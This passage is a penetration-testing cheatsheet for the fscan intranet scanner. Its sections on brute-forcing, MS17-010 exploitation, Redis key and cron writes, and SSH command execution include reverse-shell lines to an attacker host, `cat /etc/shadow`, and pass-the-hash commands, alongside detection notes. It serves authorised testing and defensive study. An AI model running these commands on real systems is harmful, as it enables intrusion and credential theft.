daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

fscan.md (43133B)


      1 ---
      2 title: "fscan"
      3 description: "fscan all-in-one intranet scanner: host/port discovery, service brute-forcing and vuln checks."
      4 category: tools
      5 tags: [scanning, enumeration, internal]
      6 tools: [fscan]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "vault:Tools/fscan.md"
     10 ---
     11 
     12 # fscan
     13 
     14 ---
     15 
     16 > **Note —** + [fscan](https://github.com/shadow1ng/fscan) Overview
     17 > Comprehensive Go-based internal network scanning framework for penetration testing and red team operations
     18 > 1. Combines host discovery, port scanning, service enumeration, and exploitation in a single binary
     19 > 2. Built-in brute-force modules for SSH, SMB, RDP, FTP, databases (MySQL, MSSQL, PostgreSQL, Redis, Oracle, MongoDB, Memcached)
     20 > 3. Web vulnerability scanning with PoC support (Weblogic, Shiro, Spring, Struts2)
     21 > 4. Exploitation capabilities: MS17-010, Redis write SSH key/cron, FastCGI RCE, SMB pass-the-hash, WMI execution
     22 > 5. Cross-platform (Windows/Linux) with no external dependencies
     23 
     24 > **Note —** + Prerequisites
     25 > 6. Network access to target range
     26 > 7. On Linux: raw ICMP requires root or `CAP_NET_RAW` (use `-ping` flag as fallback)
     27 > 8. On Windows: cmd.exe access for ping mode
     28 > 9. Valid credentials or wordlists for brute-force operations
     29 > 10. Latest stable version: v1.8.4 (May 2024); v2.0.0 in development with gRPC/API
     30 
     31 > **Note —** + OPSEC Considerations
     32 > 11. **High-noise tool**: generates significant network traffic, logged by firewalls, IDS/IPS, and target systems
     33 > 12. Full TCP handshakes (not SYN-only) logged in connection logs and SIEM
     34 > 13. Brute-force attempts create authentication failures (auth.log, Event ID 4625, fail2ban triggers)
     35 > 14. MS17-010 exploitation can cause blue screens and is detected by all modern EDR
     36 > 15. Command injection vulnerability exists in ICMP module with crafted `-hf` inputs (GitHub issue #392)
     37 > 16. Default Go HTTP User-Agent (`Go-http-client/1.1`) easily fingerprinted
     38 > 17. Output files contain sensitive data (credentials, vulnerabilities); secure or encrypt after use
     39 
     40 ---
     41 
     42 ## Host Discovery (ICMP-Based)
     43 
     44 > **Note —** + Purpose
     45 > Rapidly identify live hosts on internal networks using ICMP echo requests or command-line ping fallback
     46 
     47 ```bash
     48 # Linux (raw ICMP, requires root or CAP_NET_RAW)
     49 ./fscan -h 192.168.1.0/24
     50 
     51 # Windows
     52 fscan.exe -h 192.168.1.0/24
     53 
     54 # Command-line ping fallback (no root required on Linux)
     55 ./fscan -h 192.168.1.0/24 -ping
     56 
     57 # Skip host discovery entirely (proceed to port scanning)
     58 ./fscan -h 192.168.1.0/24 -np
     59 ```
     60 
     61 > **Note —** + Host Discovery Options
     62 > 1. **-h \<target\>**: IP, range (192.168.1.1-255), CIDR (192.168.1.0/24), comma-separated IPs, or /8 (probes .1 and .254 per /16)
     63 > 2. **-hf \<file\>**: Load targets from file (one per line)
     64 > 3. **-hn \<exclude\>**: Exclude hosts/ranges in CIDR notation (e.g., `-hn 192.168.1.1/24`)
     65 > 4. **-ping**: Use OS ping command instead of raw ICMP (safer for non-root, slower)
     66 > 5. **-np**: Skip ICMP/ping entirely; proceed directly to port scanning on all specified IPs
     67 > 6. **-t \<int\>**: Thread count (default 600)
     68 > 7. **-time \<int\>**: Per-host timeout in seconds (default 3)
     69 > 8. **-top \<int\>**: Show top N live B/C segments when scanning /8 ranges (default 10)
     70 
     71 ```bash
     72 # Standard /24 discovery scan
     73 ./fscan -h 10.0.1.0/24
     74 
     75 # Large /16 with ICMP, 800 threads
     76 ./fscan -h 172.16.0.0/16 -t 800
     77 
     78 # /8 gateway/sample discovery (scans .1 and .254 per /16)
     79 ./fscan -h 192.0.0.0/8 -m icmp
     80 
     81 # From file, exclude management subnet
     82 ./fscan -hf targets.txt -hn 10.0.0.0/28
     83 
     84 # Skip ICMP for stealth (rely on port probes)
     85 ./fscan -h 10.10.10.0/24 -np
     86 ```
     87 
     88 > **Note —** + Output Interpretation
     89 > 1. **(icmp) Target \<IP\> is alive**: Host responded to ICMP echo or ping
     90 > 2. **[*] Icmp alive hosts len is: N**: Summary of live hosts before port scan phase
     91 > 3. For /8 scans with `-m icmp`: displays top 10 B/C segments by live host count
     92 
     93 > **Note —** + OPSEC and Detection Notes
     94 > 4. Raw ICMP is noisy and easily detected by IDS/firewalls (ICMP type 8 echo requests)
     95 > 5. `-ping` uses OS utilities (logged in command history, spawns visible processes on Windows)
     96 > 6. `-np` avoids ICMP entirely but may miss hosts with all ports filtered
     97 > 7. Large thread counts generate traffic bursts visible in [NetFlow](https://en.wikipedia.org/wiki/NetFlow)/traffic analysis
     98 > 8. **Command injection vulnerability** in ICMP module when using `-hf` with crafted IP strings (CVE-like, GitHub issue #392); sanitise inputs or use `-ping` mode (not vulnerable)
     99 
    100 > **Note —** + Common Errors
    101 > 9. **bind: operation not permitted** (Linux raw ICMP): run as root or use `-ping`
    102 > 10. **No output**: firewall blocking ICMP outbound/inbound; try `-ping` or `-np`
    103 > 11. **Timeout errors on large ranges**: increase `-time` or reduce `-t` thread count
    104 > 12. **Command injection** (malicious IP file): avoid untrusted `-hf` inputs; use `-ping` for safer mode
    105 
    106 ---
    107 
    108 ## Port Scanning
    109 
    110 > **Note —** + Purpose
    111 > Comprehensive TCP port enumeration with service banner and fingerprint detection
    112 
    113 ```bash
    114 # Default ports (21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017)
    115 ./fscan -h 192.168.1.0/24
    116 
    117 # Specify custom ports
    118 ./fscan -h 192.168.1.10 -p 22,80,443,8080
    119 
    120 # Port range
    121 ./fscan -h 192.168.1.10 -p 1-65535
    122 
    123 # Add ports to default list
    124 ./fscan -h 192.168.1.0/24 -pa 3389,5900
    125 
    126 # Exclude ports from scan
    127 ./fscan -h 192.168.1.0/24 -pn 445
    128 
    129 # Port groups (v1.8.3+)
    130 ./fscan -h 192.168.1.0/24 -p web      # common web ports
    131 ./fscan -h 192.168.1.0/24 -p db       # database ports
    132 ./fscan -h 192.168.1.0/24 -p service  # common services
    133 ```
    134 
    135 > **Note —** + Port Scanning Options
    136 > 1. **-p \<spec\>**: Port(s): single (22), list (22,80,3306), range (1-1024), or group (web/db/service/all)
    137 > 2. **-pa \<ports\>**: Add ports to default list
    138 > 3. **-pn \<ports\>**: Exclude ports from scan
    139 > 4. **-portf \<file\>**: Load ports from file
    140 > 5. **-time \<int\>**: TCP connection timeout in seconds (default 3)
    141 > 6. **-np**: Skip ICMP discovery; scan all IPs regardless of ping response
    142 > 7. **-t \<int\>**: Thread count (default 600)
    143 
    144 ```bash
    145 # Quick web-only scan
    146 ./fscan -h 10.0.1.0/24 -p 80,443,8080,8443 -np
    147 
    148 # Full port scan, slow and stealthy
    149 ./fscan -h 192.168.1.50 -p 1-65535 -t 100 -time 5
    150 
    151 # Default + RDP, exclude SMB
    152 ./fscan -h 172.16.0.0/16 -pa 3389 -pn 445
    153 
    154 # Database-focused scan
    155 ./fscan -h 10.10.10.0/24 -p 1433,3306,5432,6379,27017,1521
    156 ```
    157 
    158 > **Note —** + Output Interpretation
    159 > 1. **\<IP\>:\<port\> open**: TCP handshake succeeded; port is open
    160 > 2. **[*] alive ports len is: N**: Summary before service/vulnerability scanning begins
    161 > 3. Service banners shown inline if retrieved (e.g., SSH-2.0-OpenSSH_7.4)
    162 
    163 > **Note —** + OPSEC and Detection Notes
    164 > 4. Full TCP handshake (SYN-SYN/ACK-ACK) logged by firewalls, IDS, and on target (auth.log/Security Event Log)
    165 > 5. High thread counts create connection spikes ([NetFlow](https://en.wikipedia.org/wiki/NetFlow) anomaly)
    166 > 6. Scanning [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) (445), [RDP](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/welcome-to-rds) (3389), or SQL (1433) is high-noise and often alerted
    167 > 7. No SYN-only mode; always completes handshake (noisier than nmap SYN scan)
    168 
    169 > **Note —** + Common Errors
    170 > 8. **connection refused**: port closed
    171 > 9. **timeout**: firewall drop or very slow service; increase `-time`
    172 > 10. **too many open files**: reduce `-t` threads or raise OS ulimit
    173 
    174 ---
    175 
    176 ## Service Brute-Force
    177 
    178 > **Note —** + Purpose
    179 > Password guessing against SSH, SMB, RDP, FTP, Telnet, MySQL, MSSQL, PostgreSQL, Redis, Oracle, MongoDB, Memcached with built-in or custom wordlists
    180 
    181 ```bash
    182 # Auto-brute discovered services with default wordlists
    183 ./fscan -h 192.168.1.0/24
    184 
    185 # Skip brute-force entirely
    186 ./fscan -h 192.168.1.0/24 -nobr
    187 
    188 # Specify single username and password
    189 ./fscan -h 192.168.1.0/24 -user admin -pwd password123
    190 
    191 # Custom wordlists
    192 ./fscan -h 192.168.1.0/24 -userf users.txt -pwdf passwords.txt
    193 
    194 # Add single user/password to defaults
    195 ./fscan -h 192.168.1.0/24 -usera testuser -pwda testpass
    196 
    197 # Brute-force single module only
    198 ./fscan -h 192.168.1.50 -m ssh -p 22 -userf users.txt -pwdf passwords.txt
    199 ```
    200 
    201 > **Note —** + Brute-Force Options
    202 > 1. **-nobr**: Skip all brute-force modules
    203 > 2. **-user \<string\>**: Single username
    204 > 3. **-userf \<file\>**: Username file (one per line)
    205 > 4. **-usera \<string\>**: Add username to default list
    206 > 5. **-pwd \<string\>**: Single password
    207 > 6. **-pwdf \<file\>**: Password file (one per line)
    208 > 7. **-pwda \<string\>**: Add password to default list
    209 > 8. **-br \<int\>**: Brute-force threads per service (default 1; higher = faster but noisier)
    210 > 9. **-domain \<string\>**: SMB domain (for domain-joined accounts)
    211 > 10. **-m \<module\>**: Limit brute to specific service (ssh, smb, rdp, ftp, mssql, mysql, redis, postgresql, oracle, mongodb, memcached)
    212 
    213 ```bash
    214 # SSH brute with custom list, 3 concurrent attempts per host
    215 ./fscan -h 10.0.1.0/24 -m ssh -userf admins.txt -pwdf rockyou-top1000.txt -br 3
    216 
    217 # SMB domain brute-force
    218 ./fscan -h 192.168.10.0/24 -m smb -domain CORP -user administrator -pwdf passwords.txt
    219 
    220 # MySQL single-credential test
    221 ./fscan -h 172.16.0.5 -m mysql -user root -pwd toor
    222 
    223 # MSSQL with domain authentication
    224 ./fscan -h 10.0.1.50 -m mssql -domain CORP -user sa -pwd sa
    225 
    226 # PostgreSQL brute-force
    227 ./fscan -h 172.16.0.20 -m postgresql -user postgres -pwdf pg_passwords.txt
    228 
    229 # Redis check (often no password required)
    230 ./fscan -h 192.168.1.0/24 -m redis
    231 ```
    232 
    233 > **Note —** + Output Interpretation
    234 > 1. **[+] ssh 192.168.1.10:22:root password**: Successful authentication
    235 > 2. **[-] ssh 192.168.1.10:22 root:admin Login failed**: Failed attempt
    236 > 3. Successful credentials summarised at end and saved to output file (default `result.txt`)
    237 
    238 > **Note —** + OPSEC and Detection Notes
    239 > 4. **High noise**: failed authentication attempts logged (auth.log, Event ID 4625, syslog)
    240 > 5. Default brute thread = 1 per service (slow but less likely to trigger lockout)
    241 > 6. Increasing `-br` risks account lockouts and IDS/IPS threshold alerts
    242 > 7. [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) brute generates [NTLM](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) authentication traffic (highly visible to domain controllers and SIEM)
    243 > 8. [RDP](https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/welcome-to-rds) brute can trigger Windows account lockout policies (default 5 failed attempts)
    244 > 9. Services like Redis/Memcached with no authentication are probed without brute-force
    245 > 10. Database logs capture failed authentication (MySQL general/error log, MSSQL error log, PostgreSQL pg_log)
    246 > 11. High-value targets; database brute-force often triggers SOC alerts
    247 
    248 > **Note —** + Common Errors
    249 > 12. **connection reset**: rate-limiting or ban (e.g., fail2ban)
    250 > 13. **account locked out**: reduce `-br` threads, use smaller wordlists
    251 > 14. **authentication failed** (all attempts): credentials incorrect or account disabled
    252 > 15. **timeout**: service overloaded or firewall drop
    253 > 16. **access denied** (databases): wrong credentials or host-based ACLs (e.g., MySQL bind-address)
    254 
    255 ---
    256 
    257 ## NetBIOS and SMB Enumeration
    258 
    259 > **Note —** + Purpose
    260 > Discover Windows hosts, workgroup/domain membership, hostnames, identify [domain controllers](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview)
    261 
    262 ```bash
    263 # Auto NetBIOS discovery during full scan
    264 ./fscan -h 192.168.1.0/24
    265 
    266 # NetBIOS-only mode (full detail)
    267 ./fscan -h 192.168.1.0/24 -m netbios
    268 
    269 # With SMB credentials for authenticated enumeration
    270 ./fscan -h 192.168.1.0/24 -m smb -user administrator -pwd password
    271 ```
    272 
    273 > **Note —** + NetBIOS/SMB Options
    274 > 1. **-m netbios**: Show verbose NetBIOS info (hostname, workgroup/domain, MAC, user)
    275 > 2. **-m smb**: SMB brute/enumeration; requires `-user` and `-pwd` for authenticated access
    276 > 3. **-domain \<string\>**: Specify domain for SMB authentication
    277 > 4. **-pn 445**: Skip SMB entirely (to avoid noisy SMB scanning)
    278 
    279 ```bash
    280 # Quick NetBIOS scan for domain controllers
    281 ./fscan -h 10.0.0.0/16 -m netbios -p 139
    282 
    283 # SMB authenticated enumeration
    284 ./fscan -h 192.168.10.0/24 -m smb -domain CORP -user administrator -pwd P@ssw0rd
    285 
    286 # Skip SMB ports entirely
    287 ./fscan -h 172.16.0.0/16 -pn 445,139
    288 ```
    289 
    290 > **Note —** + Output Interpretation
    291 > 1. **[*] NetBios 192.168.1.10 WORKGROUP\\HOSTNAME**: Workgroup member
    292 > 2. **[+] DC 192.168.1.10 DOMAIN\\HOSTNAME**: Domain controller (DC flag)
    293 > 3. `-m netbios` shows full table: hostname, workgroup/domain, MAC, logged-in user (if available)
    294 
    295 > **Note —** + OPSEC and Detection Notes
    296 > 4. NetBIOS queries (UDP 137, TCP 139) are low-noise but logged by domain controllers
    297 > 5. [SMB](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) (TCP 445) authenticated enumeration generates Windows Event ID 4624/4625, highly visible in SIEM
    298 > 6. Domain controller identification is sensitive; enumerating DCs alerts domain administrators
    299 > 7. Anonymous SMB enumeration often blocked (modern Windows); requires valid credentials
    300 
    301 > **Note —** + Common Errors
    302 > 8. **access denied**: SMB signing required, wrong credentials, or anonymous enumeration blocked
    303 > 9. **connection refused**: SMB disabled or firewall
    304 > 10. **timeout**: network latency; increase `-time`
    305 
    306 ---
    307 
    308 ## MS17-010 Detection and Exploitation
    309 
    310 > **Note —** + [MS17-010](https://en.wikipedia.org/wiki/EternalBlue) (EternalBlue) Overview
    311 > Critical SMB vulnerability affecting Windows XP–2008R2, unpatched Windows 7/2008 systems
    312 
    313 > **Note —** + Critical Warning
    314 > 1. **Extremely noisy**: MS17-010 exploit causes SMB crashes (blue screen potential)
    315 > 2. Detected by all modern EDR/IDS/IPS systems
    316 > 3. Exploitation = system-level compromise with high-integrity logs (Event ID 4688, 4672)
    317 > 4. **Only use on authorised lab/pentest environments**
    318 > 5. Some antivirus/EDR block or quarantine fscan.exe due to MS17-010 module
    319 
    320 ```bash
    321 # Auto-detect MS17-010 during full scan
    322 ./fscan -h 192.168.1.0/24
    323 
    324 # MS17-010 detection only
    325 ./fscan -h 192.168.1.0/24 -m ms17010
    326 
    327 # Exploit with built-in shellcode (add user)
    328 ./fscan -h 192.168.1.50 -m ms17010 -sc add
    329 ```
    330 
    331 > **Note —** + MS17-010 Options
    332 > 1. **-m ms17010**: Enable MS17-010 module
    333 > 2. **-sc \<type\>**: Shellcode action; `add` = add user (hardcoded in source; customise in `ms17010-exp.go`)
    334 > 3. Custom shellcode: edit `Plugins/ms17010-exp.go` before compiling
    335 
    336 ```bash
    337 # Scan /16 for vulnerable hosts
    338 ./fscan -h 10.0.0.0/16 -m ms17010 -np
    339 
    340 # Exploit single host, add user
    341 ./fscan -h 192.168.1.75 -m ms17010 -sc add
    342 
    343 # Detection only (no exploitation)
    344 ./fscan -h 172.16.0.0/24 -m ms17010
    345 ```
    346 
    347 > **Note —** + Output Interpretation
    348 > 1. **[+] MS17-010 192.168.1.50 (Windows 7 Professional 7601 Service Pack 1)**: Vulnerable
    349 > 2. **[*] MS17-010 Exploit success**: Shellcode executed (if `-sc` used)
    350 > 3. **[-] MS17-010 192.168.1.10 Not vulnerable**: Patched or non-vulnerable OS
    351 
    352 > **Note —** + Exploitation Notes
    353 > 4. Built-in shellcode (`-sc add`) adds user `fscan`/`fscan123` (customise in source before compiling)
    354 > 5. Prefer external tools ([Metasploit](https://www.metasploit.com/) `exploit/windows/smb/ms17_010_eternalblue`) for stable exploitation
    355 > 6. MS17-010 module uses DoublePulsar-like technique; unreliable on production systems
    356 
    357 > **Note —** + Common Errors
    358 > 7. **Not vulnerable**: host patched, non-vulnerable OS (Windows 10+, Server 2012+), or SMB disabled
    359 > 8. **Exploit failed**: target unstable, incorrect shellcode, or EDR blocked
    360 > 9. **Blue screen/crash**: target system unstable; MS17-010 exploit is inherently risky
    361 
    362 ---
    363 
    364 ## Web Fingerprinting and Title Extraction
    365 
    366 > **Note —** + Purpose
    367 > Identify web frameworks, CMS, OA systems, and extract HTTP titles for situational awareness
    368 
    369 ```bash
    370 # Auto web fingerprint during full scan
    371 ./fscan -h 192.168.1.0/24
    372 
    373 # Scan specific URL
    374 ./fscan -u http://192.168.1.50:8080
    375 
    376 # Scan URLs from file
    377 ./fscan -uf urls.txt
    378 
    379 # Skip web scanning
    380 ./fscan -h 192.168.1.0/24 -nopoc
    381 ```
    382 
    383 > **Note —** + Web Fingerprinting Options
    384 > 1. **-u \<url\>**: Single URL (v1.8.1+ supports comma-separated URLs)
    385 > 2. **-uf \<file\>**: URL file (one per line)
    386 > 3. **-nopoc**: Skip web vulnerability/fingerprint scanning
    387 > 4. **-wt \<int\>**: Web request timeout in seconds (default 5)
    388 > 5. **-proxy \<url\>**: HTTP proxy for web requests (e.g., `-proxy http://127.0.0.1:8080`)
    389 > 6. **-cookie \<string\>**: Set cookies (e.g., `-cookie "session=abc123"`)
    390 
    391 ```bash
    392 # Scan /24 for web services
    393 ./fscan -h 10.0.1.0/24 -p 80,443,8080,8443
    394 
    395 # Single URL with proxy (Burp Suite)
    396 ./fscan -u https://192.168.1.100 -proxy http://127.0.0.1:8080
    397 
    398 # URL file with extended timeout
    399 ./fscan -uf web_targets.txt -wt 10
    400 
    401 # Fast scan, skip PoC and fingerprinting
    402 ./fscan -h 172.16.0.0/16 -nopoc -nobr
    403 ```
    404 
    405 > **Note —** + Output Interpretation
    406 > 1. **[*] WebTitle http://192.168.1.10:80 code:200 len:1234 title:Apache Test Page**: HTTP status, content length, page title
    407 > 2. **[*] http://192.168.1.50:8080 [Tomcat]**: Framework/CMS fingerprint detected
    408 
    409 > **Note —** + OPSEC and Detection Notes
    410 > 1. HTTP requests logged in web server access logs (Apache access.log, IIS logs, nginx access.log)
    411 > 2. User-Agent string default is Go HTTP client (easily fingerprinted; not customisable in fscan)
    412 > 3. Requests to common paths (e.g., `/favicon.ico`, CMS-specific paths) may trigger WAF/IDS
    413 > 4. Low-noise activity unless combined with PoC scanning
    414 > 5. TLS 1.0+ supported (TLS 1.0 minimum set in v1.8.3)
    415 
    416 > **Note —** + Common Errors
    417 > 6. **timeout**: slow server or network; increase `-wt`
    418 > 7. **connection refused**: service down or firewall
    419 > 8. **SSL handshake failed**: certificate issues; fscan accepts invalid certificates by default
    420 
    421 ---
    422 
    423 ## Web Vulnerability Scanning (PoC/xray)
    424 
    425 > **Note —** + Purpose
    426 > Detect web vulnerabilities using built-in PoCs and [xray](https://github.com/chaitin/xray)-compatible PoC files (Weblogic, Shiro, Spring, Struts2, etc.)
    427 
    428 ```bash
    429 # Auto PoC scan during full scan
    430 ./fscan -h 192.168.1.0/24
    431 
    432 # PoC scan single URL
    433 ./fscan -u http://192.168.1.50:7001
    434 
    435 # Use custom PoC directory
    436 ./fscan -u http://target.local -pocpath ./custom_pocs/
    437 
    438 # Filter PoCs by name
    439 ./fscan -u http://target.local -pocname weblogic
    440 
    441 # Skip PoC scanning
    442 ./fscan -h 192.168.1.0/24 -nopoc
    443 
    444 # Full Shiro key brute (100 keys instead of 10)
    445 ./fscan -u http://192.168.1.50:8080 -full
    446 ```
    447 
    448 > **Note —** + PoC Scanning Options
    449 > 1. **-nopoc**: Skip all web PoC scanning
    450 > 2. **-pocpath \<dir\>**: Directory with custom xray-format PoC YAML files
    451 > 3. **-pocname \<string\>**: Fuzzy match PoC name (e.g., `weblogic`, `shiro`, `spring`)
    452 > 4. **-full**: Run exhaustive PoC scans (e.g., [Shiro](https://shiro.apache.org/) 100 keys instead of default 10; backup file fuzzing)
    453 > 5. **-dns**: Enable DNS log-based PoCs (requires external DNS log service; not built-in)
    454 > 6. **-num \<int\>**: PoC request rate/concurrency (default 20)
    455 > 7. **-proxy \<url\>**: HTTP proxy for PoC requests
    456 > 8. **-cookie \<string\>**: Custom cookies for PoC requests
    457 
    458 ```bash
    459 # Weblogic CVE scan
    460 ./fscan -u http://10.0.1.50:7001 -pocname weblogic
    461 
    462 # Shiro full key brute (100 keys)
    463 ./fscan -u http://192.168.1.100:8080 -pocname shiro -full
    464 
    465 # Scan with xray PoCs via Burp proxy
    466 ./fscan -u http://target.local -pocpath /opt/xray/pocs/ -proxy http://127.0.0.1:8080
    467 
    468 # Skip PoC, web fingerprint only
    469 ./fscan -h 172.16.0.0/24 -nopoc
    470 ```
    471 
    472 > **Note —** + Built-in PoC Coverage
    473 > 1. [Weblogic](https://www.oracle.com/middleware/technologies/weblogic.html) (multiple CVEs)
    474 > 2. [Apache Shiro](https://shiro.apache.org/) (default 10 keys; 100 with `-full`)
    475 > 3. [Spring Framework](https://spring.io/) (CVE-2021-21234, CVE-2022-22965, etc.)
    476 > 4. [Struts2](https://struts.apache.org/) (multiple CVEs)
    477 > 5. [ThinkPHP](http://www.thinkphp.cn/) vulnerabilities
    478 > 6. Custom xray-compatible PoCs (partial compatibility)
    479 
    480 > **Note —** + Output Interpretation
    481 > 1. **[+] PoC-2021-12345 http://192.168.1.50:7001**: Vulnerability detected (PoC name, URL)
    482 > 2. No output = no vulnerabilities detected (or `-nopoc` used)
    483 
    484 > **Note —** + OPSEC and Detection Notes
    485 > 1. **High noise**: exploitation attempts logged in web/application logs, WAF, IDS/IPS
    486 > 2. Payload strings (e.g., `{{7*7}}`, JNDI URLs) trigger WAF signatures
    487 > 3. `-full` mode sends many requests (Shiro 100 keys = 100+ requests); rate-limits or bans likely
    488 > 4. DNS log PoCs require external service (e.g., [Ceye](http://ceye.io/), [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator)); not stealthy
    489 > 5. Some PoCs attempt command execution (whoami, DNS lookups); logged as suspicious activity
    490 
    491 > **Note —** + Common Errors
    492 > 6. **timeout**: slow application or network; increase `-wt`
    493 > 7. **WAF block**: 403/429 responses; reduce `-num`, use `-proxy`, or abandon
    494 > 8. **PoC failed**: target not vulnerable, PoC outdated, or environmental issue
    495 > 9. Xray PoC incompatibility: some xray v2 PoCs unsupported; verify fscan version and PoC format
    496 
    497 ---
    498 
    499 ## Redis Exploitation
    500 
    501 > **Note —** + Purpose
    502 > Exploit unauthenticated or authenticated [Redis](https://redis.io/) to write SSH public key or cron reverse shell
    503 
    504 > **Note —** + Prerequisites
    505 > 1. Redis (port 6379) open and writable
    506 > 2. Target Linux system with Redis running as user with SSH or cron access
    507 > 3. Modern Redis often requires authentication; unauthenticated instances rare but high-value
    508 
    509 ```bash
    510 # Auto-detect Redis during scan (shows unauthorised status)
    511 ./fscan -h 192.168.1.0/24
    512 
    513 # Write SSH public key to target
    514 ./fscan -h 192.168.1.50 -m redis -rf id_rsa.pub
    515 
    516 # Write cron reverse shell
    517 ./fscan -h 192.168.1.50 -m redis -rs 192.168.1.100:4444
    518 
    519 # Skip Redis exploitation
    520 ./fscan -h 192.168.1.0/24 -noredis
    521 ```
    522 
    523 > **Note —** + Redis Exploitation Options
    524 > 1. **-m redis**: Redis module (detection + exploitation if `-rf` or `-rs` used)
    525 > 2. **-rf \<file\>**: SSH public key file to write to `~/.ssh/authorized_keys`
    526 > 3. **-rs \<IP:port\>**: Attacker IP:port for reverse shell via cron (e.g., `-rs 10.0.1.5:6666`)
    527 > 4. **-noredis**: Skip Redis security tests (detection only, no exploitation)
    528 > 5. **-pwd \<string\>**: Redis password (if authentication enabled)
    529 
    530 ```bash
    531 # Generate SSH key, write to Redis target
    532 ssh-keygen -t rsa -f fscan_key
    533 ./fscan -h 10.0.1.75 -m redis -rf fscan_key.pub
    534 ssh -i fscan_key redis@10.0.1.75
    535 
    536 # Cron reverse shell exploitation
    537 nc -lvnp 4444  # listener on attacker machine
    538 ./fscan -h 192.168.1.50 -m redis -rs 192.168.1.100:4444
    539 
    540 # Authenticated Redis exploitation
    541 ./fscan -h 172.16.0.10 -m redis -pwd foobared -rf id_rsa.pub
    542 ```
    543 
    544 > **Note —** + Output Interpretation
    545 > 1. **[+] Redis 192.168.1.50:6379 unauthorized file:/var/lib/redis/dump.rdb**: No authentication, writable, file path disclosed
    546 > 2. **[+] Redis 192.168.1.50 Write SSH Key Success**: SSH key written to `authorized_keys`
    547 > 3. **[+] Redis 192.168.1.50 Write Cron Success**: Cron job created for reverse shell
    548 
    549 > **Note —** + Exploitation Technique Notes
    550 > 4. Targets Linux only (SSH key / cron paths hardcoded for Linux)
    551 > 5. Redis exploitation removed from default scan in some versions; use `-m redis` explicitly
    552 > 6. Cron reverse shell format: `*/1 * * * * bash -i >& /dev/tcp/<IP>/<PORT> 0>&1`
    553 
    554 > **Note —** + OPSEC and Detection Notes
    555 > 7. **High noise**: writing files/cron jobs creates forensic artefacts (`authorized_keys`, `/var/spool/cron`)
    556 > 8. Redis logs (`redis.log`) capture commands (`CONFIG SET`, `SET`, `SAVE`)
    557 > 9. Cron reverse shell spawns network connection (logged in NetFlow, firewall, and process logs)
    558 > 10. SSH key persistence obvious in `~/.ssh/authorized_keys`
    559 
    560 > **Note —** + Common Errors
    561 > 11. **NOAUTH Authentication required**: Redis password set; use `-pwd` or skip
    562 > 12. **Permission denied**: Redis user lacks write access to `/root/.ssh/` or `/var/spool/cron`
    563 > 13. **CONFIG SET failed**: Redis `config` command disabled (common hardening)
    564 > 14. Cron not triggered: cron daemon not running, or syntax error in cron entry
    565 
    566 ---
    567 
    568 ## SSH Command Execution (Post-Exploit)
    569 
    570 > **Note —** + Purpose
    571 > Execute commands on SSH targets after successful brute-force or using known credentials/SSH key
    572 
    573 ```bash
    574 # Execute command after successful SSH brute
    575 ./fscan -h 192.168.1.0/24 -m ssh -c "whoami; id"
    576 
    577 # Use SSH private key + command
    578 ./fscan -h 192.168.1.50 -m ssh -sshkey id_rsa -user root -c "uname -a"
    579 
    580 # Brute + command on custom port
    581 ./fscan -h 10.0.1.0/24 -m ssh -p 2222 -c "cat /etc/passwd"
    582 ```
    583 
    584 > **Note —** + SSH Command Execution Options
    585 > 1. **-c \<string\>**: Command to execute (semicolon-separated for multiple commands)
    586 > 2. **-sshkey \<file\>**: SSH private key file (e.g., `id_rsa`)
    587 > 3. **-user \<string\>**: Username (required with `-sshkey`)
    588 > 4. **-m ssh**: SSH module
    589 > 5. **-p \<port\>**: Custom SSH port
    590 
    591 ```bash
    592 # Post-exploit enumeration
    593 ./fscan -h 192.168.1.75 -m ssh -user admin -pwd admin -c "whoami; hostname; ip a"
    594 
    595 # SSH key-based command execution
    596 ./fscan -h 10.0.1.100 -m ssh -sshkey ~/.ssh/pentest_key -user root -c "cat /etc/shadow"
    597 
    598 # Reverse shell
    599 ./fscan -h 192.168.1.50 -m ssh -user admin -pwd admin -c "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1"
    600 ```
    601 
    602 > **Note —** + Output Interpretation
    603 > 1. **[+] SSH 192.168.1.50:22:root password**: Credentials valid
    604 > 2. Command output printed inline (stdout from SSH session)
    605 
    606 > **Note —** + OPSEC and Detection Notes
    607 > 1. SSH logins logged (`auth.log`, `/var/log/secure`, Event Logs on some systems)
    608 > 2. Command execution visible in shell history (`.bash_history`, `.zsh_history`) unless overridden
    609 > 3. Processes spawned by commands visible in `ps`, `/proc`, and EDR telemetry
    610 > 4. Network connections from reverse shells logged in NetFlow, firewall, and process network logs
    611 > 5. Low-noise login (SSH key-based) preferred over brute-force
    612 
    613 > **Note —** + Technical Notes
    614 > 6. SSH key support added in v1.6.2
    615 > 7. Commands executed in non-interactive shell; some commands requiring TTY may fail
    616 > 8. Workaround for TTY requirements: `python -c 'import pty; pty.spawn("/bin/bash")'`
    617 
    618 > **Note —** + Common Errors
    619 > 9. **Permission denied (publickey)**: SSH key not accepted; use password authentication (`-pwd`)
    620 > 10. **timeout**: network latency or SSH tarpit; increase `-time`
    621 > 11. Command failed: syntax error, missing binary, or insufficient privileges
    622 
    623 ---
    624 
    625 ## SMB Pass-the-Hash and WMIExec
    626 
    627 > **Note —** + Purpose
    628 > Lateral movement via SMB using [NTLM hash](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) (pass-the-hash) or remote command execution via [WMI](https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page) (no output)
    629 
    630 ```bash
    631 # SMB pass-the-hash
    632 ./fscan -h 192.168.1.0/24 -m smb2 -user administrator -hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    633 
    634 # WMI command execution (no echo)
